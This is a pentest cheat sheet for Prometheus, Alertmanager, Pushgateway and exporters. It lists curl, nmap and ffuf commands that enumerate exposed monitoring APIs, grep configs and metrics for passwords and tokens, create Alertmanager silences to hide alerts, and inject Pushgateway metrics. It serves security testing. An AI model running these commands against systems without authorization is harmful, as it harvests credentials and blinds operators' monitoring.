Prometheus, Alertmanager and Exporters
Default Ports: 9090 (Prometheus), 9093 (Alertmanager), 9100 (Node Exporter)
Prometheus collects metrics, Alertmanager routes alerts, and exporters expose host or application metrics. In pentests, monitoring endpoints can leak internal targets, hostnames, cloud labels, Kubernetes metadata, URLs, credentials in labels, and operational alerts.
Connect
Prometheus API
The API exposes targets, labels, metrics, and runtime status.
curl http://target.com:9090/-/ready
curl http://target.com:9090/-/healthy
curl 'http://target.com:9090/api/v1/query?query=up'
curl http://target.com:9090/api/v1/targets
Alertmanager API
Alertmanager exposes active alerts, receivers, and silences.
curl http://target.com:9093/-/ready
curl http://target.com:9093/api/v2/alerts
curl http://target.com:9093/api/v2/silences
Exporters
Exporters expose raw metrics for hosts and applications.
curl http://target.com:9100/metrics
curl http://target.com:9115/metrics
curl http://target.com:8080/metrics
Recon
Service Detection with Nmap
Scan common Prometheus, Alertmanager, Pushgateway, and exporter ports.
nmap -p 9090,9091,9093,9100,9115,9121,9187,9200,9308,9404 -sV target.com
nmap -p 9090,9093,9100 --script http-title,http-headers target.com
nmap -p 9090,9093,9100 --open -sV 10.0.0.0/24
Web UI Discovery
The UI quickly confirms exposure and authentication state.
curl -i http://target.com:9090/
curl -i http://target.com:9093/
httpx -l targets.txt -ports 9090,9093,9100,9115,9404 -title -status-code
Metrics Endpoint Discovery
Applications may expose metrics outside default Prometheus ports.
ffuf -u http://target.com/FUZZ -w wordlist.txt -mc all
curl -I http://target.com/metrics
curl -I http://target.com/actuator/prometheus
Enumeration
Target Enumeration
Targets reveal monitored hosts, ports, labels, and scrape paths.
curl http://target.com:9090/api/v1/targets | jq
curl http://target.com:9090/api/v1/service-discovery | jq
Label Enumeration
Labels often reveal environments, clusters, tenants, and cloud metadata.
curl http://target.com:9090/api/v1/labels | jq
curl 'http://target.com:9090/api/v1/label/job/values' | jq
curl 'http://target.com:9090/api/v1/label/instance/values' | jq
Metric Enumeration
Metric names expose applications, databases, queues, and frameworks.
curl http://target.com:9090/api/v1/label/__name__/values | jq
curl 'http://target.com:9090/api/v1/query?query=up' | jq
Config Enumeration
Prometheus config may reveal scrape targets and credentials.
curl http://target.com:9090/api/v1/status/config | jq
curl http://target.com:9090/api/v1/status/flags | jq
Alert Enumeration
Alerts reveal incidents, failing services, and operational routing.
curl http://target.com:9090/api/v1/alerts | jq
curl http://target.com:9093/api/v2/alerts | jq
curl http://target.com:9093/api/v2/receivers | jq
Attack Vectors
Unauthenticated Prometheus
Open Prometheus can disclose internal infrastructure.
curl http://target.com:9090/api/v1/targets | jq
curl http://target.com:9090/api/v1/status/config | jq
Exporter Data Leakage
Exporters may leak host, process, filesystem, or app metadata.
curl http://target.com:9100/metrics | grep -Ei 'node_uname|mount|filesystem|cpu|memory'
curl http://target.com:8080/metrics | grep -Ei 'password|secret|token|url|jdbc|redis|kafka'
Sensitive Labels
Secrets sometimes appear in labels or target metadata.
curl http://target.com:9090/api/v1/targets | grep -Ei 'password|secret|token|apikey|authorization'
curl http://target.com:9090/api/v1/status/config | grep -Ei 'password|secret|token|bearer'
Alertmanager Silence Abuse
If write access is allowed, attackers may hide alerts.
curl -X POST http://target.com:9093/api/v2/silences \
-H 'Content-Type: application/json' \
-d '{"matchers":[{"name":"alertname","value":"TestAlert","isRegex":false}],"startsAt":"2026-01-01T00:00:00Z","endsAt":"2026-01-01T01:00:00Z","createdBy":"pentest","comment":"authorized test"}'
Pushgateway Abuse
Pushgateway may allow metric injection.
echo 'pentest_metric 1' | curl --data-binary @- http://target.com:9091/metrics/job/pentest
curl http://target.com:9091/metrics
Post-Exploitation
Infrastructure Mapping
Use targets and labels to map internal systems.
curl http://target.com:9090/api/v1/targets > prometheus-targets.json
curl http://target.com:9090/api/v1/label/instance/values > prometheus-instances.json
curl http://target.com:9090/api/v1/label/job/values > prometheus-jobs.json
Secret Review
Search configs, targets, and metrics for sensitive values.
grep -Ei 'password|secret|token|apikey|bearer|authorization|jdbc|redis|s3' prometheus-*.json
Alert Review
Alerts show critical systems and active incidents.
curl http://target.com:9090/api/v1/alerts > prometheus-alerts.json
curl http://target.com:9093/api/v2/alerts > alertmanager-alerts.json
Useful Tools
| Tool | Purpose |
|---|---|
curl | API and metrics checks |
jq | JSON parsing |
nmap | Port scanning |
httpx | UI fingerprinting |
ffuf | Metrics path discovery |
grep / rg | Sensitive value search |
Security Misconfigurations
| Misconfiguration | Risk |
|---|---|
| Prometheus exposed | Internal target disclosure |
| Alertmanager exposed | Alert and receiver leakage |
| Exporters exposed | Host and app metadata leakage |
| Config endpoint accessible | Scrape config and token disclosure |
| Sensitive labels | Credential leakage |
| Alert silences writable | Monitoring bypass |
| Pushgateway writable | Metric injection |
| No authentication | Broad monitoring access |